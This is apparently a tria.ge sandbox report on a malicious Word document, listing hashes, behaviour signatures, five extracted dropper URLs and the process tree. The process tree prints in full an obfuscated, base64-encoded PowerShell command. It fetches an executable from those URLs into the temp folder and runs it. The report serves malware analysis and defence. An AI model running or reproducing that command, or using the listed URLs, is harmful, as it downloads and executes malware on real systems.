Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    19/09/2024, 01:57

General

  • Target

    ea6151f2ac021c315206d6ad15bb65c9_JaffaCakes118.doc

  • Size

    248KB

  • MD5

    ea6151f2ac021c315206d6ad15bb65c9

  • SHA1

    6ff1fab8609ecf46252920721b5a739db38bd5b9

  • SHA256

    d98f213fb4802c2a0443ec4bac831c3d727ab699fd6858316ee89afda8849042

  • SHA512

    e2fbf0bc205246b02bd93f8274e491612c8574690bac2313d2f9fc253a06d19bdf904978b2329c132321c38d0376a9bcc9f333ab744dae543c073fb0ea5c0e1c

  • SSDEEP

    3072:O1ldztZGREmz/rSjpBGABScsXy6jL/xSu90OoiLuDKZXfwKeljR16:6GREmz/rStgc3YyoxUOmD+XfwLe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://cardiologiarocco.com.br/hcr62qm03s5k_Cxz5E0

exe.dropper

http://etnoselostavna.me/04WMQVc0GT_KTIgh7

exe.dropper

http://www.kvona.com/60URNkr5

exe.dropper

http://dansavanh.in.th/wp-includes/xxZl0ALBp7f

exe.dropper

http://747big.com/WmSGWESw5CpppE

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ea6151f2ac021c315206d6ad15bb65c9_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e JABYAHYARgB1AHEAaQA5AD0AKAAnAEIAJwArACcAbwA4AGoATwA5ACcAKQA7ACQAZAAwADEAYgBLAFAARwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAHMAegA0AE4AagA0ADIAPQAoACcAaAB0AHQAcAA6AC8ALwBjACcAKwAnAGEAcgBkACcAKwAnAGkAbwBsAG8AZwBpAGEAcgAnACsAJwBvAGMAYwBvAC4AYwBvACcAKwAnAG0ALgBiACcAKwAnAHIALwBoAGMAcgA2ACcAKwAnADIAcQBtADAAMwBzADUAawBfACcAKwAnAEMAeAB6ADUARQAwAEAAJwArACcAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwBlAHQAJwArACcAbgBvAHMAZQBsAG8AcwB0AGEAdgBuAGEALgBtACcAKwAnAGUALwAnACsAJwAwACcAKwAnADQAVwBNAFEAVgAnACsAJwBjADAARwBUAF8ASwBUAEkAJwArACcAZwBoADcAQABoACcAKwAnAHQAdABwADoALwAvAHcAdwB3AC4AawB2AG8AbgBhAC4AJwArACcAYwBvACcAKwAnAG0ALwA2ADAAVQBSAE4AJwArACcAawByADUAJwArACcAQABoAHQAJwArACcAdABwADoAJwArACcALwAvAGQAYQAnACsAJwBuAHMAYQB2ACcAKwAnAGEAbgBoAC4AaQAnACsAJwBuAC4AJwArACcAdABoAC8AdwAnACsAJwBwACcAKwAnAC0AJwArACcAaQBuACcAKwAnAGMAbAAnACsAJwB1AGQAZQBzACcAKwAnAC8AeAB4AFoAJwArACcAbAAnACsAJwAwAEEATABCAHAANwBmAEAAaAB0AHQAcAAnACsAJwA6AC8ALwA3ADQANwBiAGkAZwAnACsAJwAuACcAKwAnAGMAbwBtAC8AJwArACcAVwBtAFMARwBXAEUAJwArACcAUwB3ADUAQwAnACsAJwBwAHAAcABFACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFMAVQAwAGsAcABhAD0AKAAnAEsAJwArACcAagAnACsAJwA4AGsANABqAHEAdwAnACkAOwAkAFEAVwA0AHoASgAxAEoAIAA9ACAAKAAnADkANgAnACsAJwA4ACcAKQA7ACQATgBYAEQAMAA1AHQANABXAD0AKAAnAHAASQA2AEEAQwAnACsAJwBpAHcAJwApADsAJABtAGQAMwBBAEMAWQA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcACcAKwAkAFEAVwA0AHoASgAxAEoAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABWAHoAbABkAG0AZAAgAGkAbgAgACQAaQBzAHoANABOAGoANAAyACkAewB0AHIAeQB7ACQAZAAwADEAYgBLAFAARwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABWAHoAbABkAG0AZAAsACAAJABtAGQAMwBBAEMAWQApADsAJABvAFUASgAzAGkAOABBAHEAPQAoACcAdwBMACcAKwAnAGkARQBQAGoAdAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABtAGQAMwBBAEMAWQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAG0AZAAzAEEAQwBZADsAJABFADEAdwBFAG4AaQBZAD0AKAAnAGkAMgAnACsAJwBGADMANwBEACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABGAGYAaQBCADQAQwBuAD0AKAAnAEoAJwArACcAUABFAHEAJwArACcAYQBTAEwAJwApADsA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2980
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3052

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      32242f8c893ae1a454c98f47fd52459b

      SHA1

      6c40ee751c3673721e0fad17b55321a4d0b6bdaa

      SHA256

      16b791f7c92a0add08a3d961d7a4a1996ad77bae1c3462b1010a0fb58ce6acc6

      SHA512

      cb12fb11bdef91d0679818fefafd71ee0ccde97f2b825b8d0ff408413d0c3b821ad8d834d7102fcb1d086081c316b9f2bde4d3cf58c85cb15ca3ccbcdab92b8c

    • memory/2736-106-0x00000000717ED000-0x00000000717F8000-memory.dmp

      Filesize

      44KB

    • memory/2736-48-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-17-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-18-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-22-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-23-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-107-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-37-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-28-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-27-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-66-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-39-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-42-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-0-0x000000002F611000-0x000000002F612000-memory.dmp

      Filesize

      4KB

    • memory/2736-2-0x00000000717ED000-0x00000000717F8000-memory.dmp

      Filesize

      44KB

    • memory/2736-105-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-109-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-68-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-67-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-58-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-86-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-47-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-77-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-112-0x0000000006A70000-0x0000000006B70000-memory.dmp

      Filesize

      1024KB

    • memory/2736-113-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-114-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-115-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-116-0x0000000005250000-0x0000000005350000-memory.dmp

      Filesize

      1024KB

    • memory/2736-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2736-140-0x00000000717ED000-0x00000000717F8000-memory.dmp

      Filesize

      44KB